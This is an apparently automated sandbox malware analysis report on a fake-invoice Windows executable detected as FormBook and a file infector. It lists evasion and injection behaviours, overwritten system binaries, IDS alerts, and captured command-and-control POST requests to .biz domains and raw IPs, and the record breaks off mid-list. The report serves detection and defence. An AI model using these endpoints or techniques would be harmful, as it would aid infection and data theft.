Windows Analysis Report
INV_NE_02_2034388.exe

Overview

General Information

Sample name: INV_NE_02_2034388.exe
Analysis ID: 1574347
MD5: c5843430a72fa7b29070c33f0f4d83d2
SHA1: a5c6c473fc57e7a8b26bb4acef0be2843aa56653
SHA256: 77fff1c59aace50f9bbb9184b1086cccb57df0cb5d3b10589a9b6b91283aa719
Tags: exe, user-julianmckein

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Contains functionality to behave differently if executed on a Russian/Kazakh computer
Creates files in the system32 config directory
Drops executable to a common third party application directory
Found direct / indirect Syscall (likely to bypass EDR)
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Writes to foreign memory regions
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Enables driver privileges
Enables security privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Uncommon Svchost Parent Process
Spawns drivers
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • INV_NE_02_2034388.exe (PID: 7368 cmdline: "C:\Users\user\Desktop\INV_NE_02_2034388.exe" MD5: C5843430A72FA7B29070C33F0F4D83D2)
    • svchost.exe (PID: 8112 cmdline: "C:\Users\user\Desktop\INV_NE_02_2034388.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
  • armsvc.exe (PID: 7428 cmdline: "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe" MD5: 4768582FEC7E07C429C532098BB3A67A)
  • alg.exe (PID: 7548 cmdline: C:\Windows\System32\alg.exe MD5: B0C38B43BA0CC2CDF73E2C84A80101CF)
  • AppVStrm.sys (PID: 4 cmdline: MD5: BDA55F89B69757320BC125FF1CB53B26)
  • AppvVemgr.sys (PID: 4 cmdline: MD5: E70EE9B57F8D771E2F4D6E6B535F6757)
  • AppvVfs.sys (PID: 4 cmdline: MD5: 2CBABD729D5E746B6BD8DC1B4B4DB1E1)
  • AppVClient.exe (PID: 7852 cmdline: C:\Windows\system32\AppVClient.exe MD5: BAE30C5C71632F53795DE111E7ED6DC7)
  • FXSSVC.exe (PID: 7956 cmdline: C:\Windows\system32\fxssvc.exe MD5: CCD5F7B3E8C0B4733DD115FF88547F14)
  • elevation_service.exe (PID: 8084 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe" MD5: F48DDCBA6A247532AFB4E29CAAD7C016)
  • maintenanceservice.exe (PID: 8132 cmdline: "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe" MD5: 1B5C1CB5B173A3E9004CEBAB7FD31E75)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000011.00000002.1702591892.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000011.00000002.1704054953.0000000003A80000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
17.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
17.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

System Summary

Source: Process started | Author: Max Altgelt (Nextron Systems) | Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\drivers\AppVStrm.sys, NewProcessName: C:\Windows\System32\drivers\AppVStrm.sys, OriginalFileName: C:\Windows\System32\drivers\AppVStrm.sys, ParentCommandLine: , ParentImage: , ParentProcessId: -1, ProcessCommandLine: , ProcessId: 4, ProcessName: AppVStrm.sys
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\INV_NE_02_2034388.exe", CommandLine: "C:\Users\user\Desktop\INV_NE_02_2034388.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\INV_NE_02_2034388.exe", ParentImage: C:\Users\user\Desktop\INV_NE_02_2034388.exe, ParentProcessId: 7368, ParentProcessName: INV_NE_02_2034388.exe, ProcessCommandLine: "C:\Users\user\Desktop\INV_NE_02_2034388.exe", ProcessId: 8112, ProcessName: svchost.exe
Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\INV_NE_02_2034388.exe", CommandLine: "C:\Users\user\Desktop\INV_NE_02_2034388.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\INV_NE_02_2034388.exe", ParentImage: C:\Users\user\Desktop\INV_NE_02_2034388.exe, ParentProcessId: 7368, ParentProcessName: INV_NE_02_2034388.exe, ProcessCommandLine: "C:\Users\user\Desktop\INV_NE_02_2034388.exe", ProcessId: 8112, ProcessName: svchost.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-13T08:58:02.451238+0100 | 2051649 | 1 | A Network Trojan was detected | 192.168.2.7 | 64716 | 1.1.1.1 | 53 | UDP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-13T08:57:53.707129+0100 | 2051648 | 1 | A Network Trojan was detected | 192.168.2.7 | 52945 | 1.1.1.1 | 53 | UDP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-13T08:57:47.143286+0100 | 2018141 | 1 | A Network Trojan was detected | 54.244.188.177 | 80 | 192.168.2.7 | 49701 | TCP
2024-12-13T08:57:53.777240+0100 | 2018141 | 1 | A Network Trojan was detected | 44.221.84.105 | 80 | 192.168.2.7 | 49711 | TCP
2024-12-13T08:58:05.616265+0100 | 2018141 | 1 | A Network Trojan was detected | 18.141.10.107 | 80 | 192.168.2.7 | 49738 | TCP
2024-12-13T08:59:39.008398+0100 | 2018141 | 1 | A Network Trojan was detected | 47.129.31.212 | 80 | 192.168.2.7 | 49950 | TCP
2024-12-13T08:59:41.942002+0100 | 2018141 | 1 | A Network Trojan was detected | 13.251.16.150 | 80 | 192.168.2.7 | 49960 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-13T08:57:47.143286+0100 | 2037771 | 1 | A Network Trojan was detected | 54.244.188.177 | 80 | 192.168.2.7 | 49701 | TCP
2024-12-13T08:57:53.777240+0100 | 2037771 | 1 | A Network Trojan was detected | 44.221.84.105 | 80 | 192.168.2.7 | 49711 | TCP
2024-12-13T08:58:05.616265+0100 | 2037771 | 1 | A Network Trojan was detected | 18.141.10.107 | 80 | 192.168.2.7 | 49738 | TCP
2024-12-13T08:59:39.008398+0100 | 2037771 | 1 | A Network Trojan was detected | 47.129.31.212 | 80 | 192.168.2.7 | 49950 | TCP
2024-12-13T08:59:41.942002+0100 | 2037771 | 1 | A Network Trojan was detected | 13.251.16.150 | 80 | 192.168.2.7 | 49960 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-13T08:57:47.022692+0100 | 2850851 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49701 | 54.244.188.177 | 80 | TCP
2024-12-13T08:58:50.913385+0100 | 2850851 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49795 | 82.112.184.197 | 80 | TCP

AV Detection

Source: INV_NE_02_2034388.exe | Avira: detected
Source: http://54.244.188.177/G | Avira URL Cloud: Label: phishing
Source: http://54.244.188.177/f | Avira URL Cloud: Label: phishing
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Windows\System32\AppVClient.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Windows\System32\msdtc.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Windows\System32\FXSSVC.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Windows\System32\alg.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: INV_NE_02_2034388.exe | ReversingLabs: Detection: 81%
Source: Yara match | File source: 17.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000011.00000002.1702591892.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.1704054953.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Joe Sandbox ML: detected
Source: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe | Joe Sandbox ML: detected
Source: C:\Windows\System32\AppVClient.exe | Joe Sandbox ML: detected
Source: C:\Windows\System32\msdtc.exe | Joe Sandbox ML: detected
Source: C:\Windows\System32\FXSSVC.exe | Joe Sandbox ML: detected
Source: C:\Windows\System32\alg.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Joe Sandbox ML: detected
Source: INV_NE_02_2034388.exe | Joe Sandbox ML: detected
Source: INV_NE_02_2034388.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: INV_NE_02_2034388.exe, 00000000.00000003.1257051766.0000000003F20000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe.0.dr
Source: Binary string: D:\a\_work\e\src\out\Release_x64\elevation_service.exe.pdb source: elevation_service.exe.0.dr
Source: Binary string: msdtcexe.pdb source: msdtc.exe.0.dr
Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: INV_NE_02_2034388.exe, 00000000.00000003.1284182202.0000000004140000.00000004.00001000.00020000.00000000.sdmp, DiagnosticsHub.StandardCollector.Service.exe.0.dr
Source: Binary string: AppVClient.pdbGCTL source: AppVClient.exe.0.dr
Source: Binary string: ALG.pdbGCTL source: INV_NE_02_2034388.exe, 00000000.00000003.1262069342.0000000003F20000.00000004.00001000.00020000.00000000.sdmp, alg.exe.0.dr
Source: Binary string: AppVClient.pdb source: AppVClient.exe.0.dr
Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: INV_NE_02_2034388.exe, 00000000.00000003.1284182202.0000000004140000.00000004.00001000.00020000.00000000.sdmp, DiagnosticsHub.StandardCollector.Service.exe.0.dr
Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: INV_NE_02_2034388.exe, 00000000.00000003.1296981410.0000000004130000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: PresentationFontCache.pdb source: INV_NE_02_2034388.exe, 00000000.00000003.1296981410.0000000004130000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: maintenanceservice.pdb` source: INV_NE_02_2034388.exe, 00000000.00000003.1323205740.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, maintenanceservice.exe.0.dr
Source: Binary string: FXSSVC.pdbGCTL source: FXSSVC.exe.0.dr
Source: Binary string: wntdll.pdbUGP source: INV_NE_02_2034388.exe, 00000000.00000003.1323303051.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 00000000.00000003.1321402996.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.1704218359.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1657817328.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.1704218359.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1654702449.0000000003800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: INV_NE_02_2034388.exe, 00000000.00000003.1323303051.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 00000000.00000003.1321402996.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000011.00000002.1704218359.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1657817328.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.1704218359.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1654702449.0000000003800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\e\src\out\Release_x64\elevation_service.exe.pdbOGP source: elevation_service.exe.0.dr
Source: Binary string: C:\b\s\w\ir\cache\builder\src\out\Release_x64\elevation_service.exe.pdb source: elevation_service.exe0.0.dr
Source: Binary string: FXSSVC.pdb source: FXSSVC.exe.0.dr
Source: Binary string: ALG.pdb source: INV_NE_02_2034388.exe, 00000000.00000003.1262069342.0000000003F20000.00000004.00001000.00020000.00000000.sdmp, alg.exe.0.dr
Source: Binary string: maintenanceservice.pdb source: INV_NE_02_2034388.exe, 00000000.00000003.1323205740.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, maintenanceservice.exe.0.dr
Source: Binary string: msdtcexe.pdbGCTL source: msdtc.exe.0.dr

Spreading

Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | System file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | System file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | System file written: C:\Windows\System32\AppVClient.exe
Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | System file written: C:\Windows\System32\FXSSVC.exe
Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | System file written: C:\Windows\System32\alg.exe
Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\elevation_service.exe
Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | System file written: C:\Windows\System32\msdtc.exe
Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Code function: 0_2_0046445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0046445A
Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Code function: 0_2_0046C6D1 FindFirstFileW,FindClose,0_2_0046C6D1
Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Code function: 0_2_0046C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0046C75C
Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Code function: 0_2_0046EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0046EF95
Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Code function: 0_2_0046F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0046F0F2
Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Code function: 0_2_0046F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0046F3F3
Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Code function: 0_2_004637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_004637EF
Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Code function: 0_2_00463B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00463B12
Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Code function: 0_2_0046BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0046BCBC

Networking

Source: Network traffic | Suricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.7:52945 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.7:49701 -> 54.244.188.177:80
Source: Network traffic | Suricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.7:64716 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.7:49795 -> 82.112.184.197:80
Source: Joe Sandbox View | IP Address: 54.244.188.177 54.244.188.177
Source: Joe Sandbox View | IP Address: 18.141.10.107 18.141.10.107
Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.141.10.107:80 -> 192.168.2.7:49738
Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.141.10.107:80 -> 192.168.2.7:49738
Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.244.188.177:80 -> 192.168.2.7:49701
Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.244.188.177:80 -> 192.168.2.7:49701
Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 44.221.84.105:80 -> 192.168.2.7:49711
Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 44.221.84.105:80 -> 192.168.2.7:49711
Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 47.129.31.212:80 -> 192.168.2.7:49950
Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 47.129.31.212:80 -> 192.168.2.7:49950
Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 13.251.16.150:80 -> 192.168.2.7:49960
Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 13.251.16.150:80 -> 192.168.2.7:49960
Source: global traffic | HTTP traffic detected:
    POST /wtafuencqgdxd HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: pywolwnvd.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 824
Source: global traffic | HTTP traffic detected:
    POST /trlioiljoillllwq HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: pywolwnvd.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 874
Source: global traffic | HTTP traffic detected:
    POST /amnlbtdctisruxvs HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: ssbzmoy.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 824
Source: global traffic | HTTP traffic detected:
    POST /wibawwpi HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: ssbzmoy.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 874
Source: global traffic | HTTP traffic detected:
    POST /mddjrljmh HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: cvgrf.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 874
Source: global traffic | HTTP traffic detected:
    POST /btfx HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: knjghuig.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 874
Source: global traffic | HTTP traffic detected:
    POST /x HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: vcddkls.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 874
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Code function: 0_2_004722EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_004722EE
Source: global traffic | DNS traffic detected: DNS query: pywolwnvd.biz
Source: global traffic | DNS traffic detected: DNS query: ssbzmoy.biz
Source: global traffic | DNS traffic detected: DNS query: cvgrf.biz
Source: global traffic | DNS traffic detected: DNS query: fwiwk.biz
Source: unknown | HTTP traffic detected:
    POST /wtafuencqgdxd HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: pywolwnvd.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 824
Source: INV_NE_02_2034388.exe, 00000000.00000002.1341516970.0000000000CB2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://18.141.10.107/
Source: INV_NE_02_2034388.exe, 00000000.00000002.1341299019.0000000000C58000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://18.141.10.107/Oeh
Source: INV_NE_02_2034388.exe, 00000000.00000002.1341516970.0000000000CB2000.00000004.00000020.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 00000000.00000002.1341299019.0000000000C58000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://18.141.10.107/amnlbtdctisruxvs
Source: INV_NE_02_2034388.exe, 00000000.00000002.1341516970.0000000000CB2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://18.141.10.107/b
Source: INV_NE_02_2034388.exe, 00000000.00000002.1341516970.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://54.244.188.177/5
Source: INV_NE_02_2034388.exe, 00000000.00000002.1341516970.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://54.244.188.177/9N
Source: INV_NE_02_2034388.exe, 00000000.00000003.1307700922.0000000000CB2000.00000004.00000020.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 00000000.00000003.1314358242.0000000000CB2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://54.244.188.177/G
Source: INV_NE_02_2034388.exe, 00000000.00000002.1341516970.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://54.244.188.177/f
Source: INV_NE_02_2034388.exe, 00000000.00000003.1313746685.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 00000000.00000002.1343295812.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://54.244.188.177/wtafuenc
Source: INV_NE_02_2034388.exe, 00000000.00000003.1292338634.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 00000000.00000003.1286250862.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 00000000.00000003.1296335740.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 00000000.00000003.1288005450.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 00000000.00000003.1287564151.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 00000000.00000003.1297197458.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 00000000.00000003.1307257706.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 00000000.00000003.1285212644.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 00000000.00000003.1296483664.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 00000000.00000003.1301284711.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 00000000.00000002.1342241605.0000000000D6F000.00000004.00000020.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 00000000.00000003.1284963561.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp, INV_NE_02_2034388.exe, 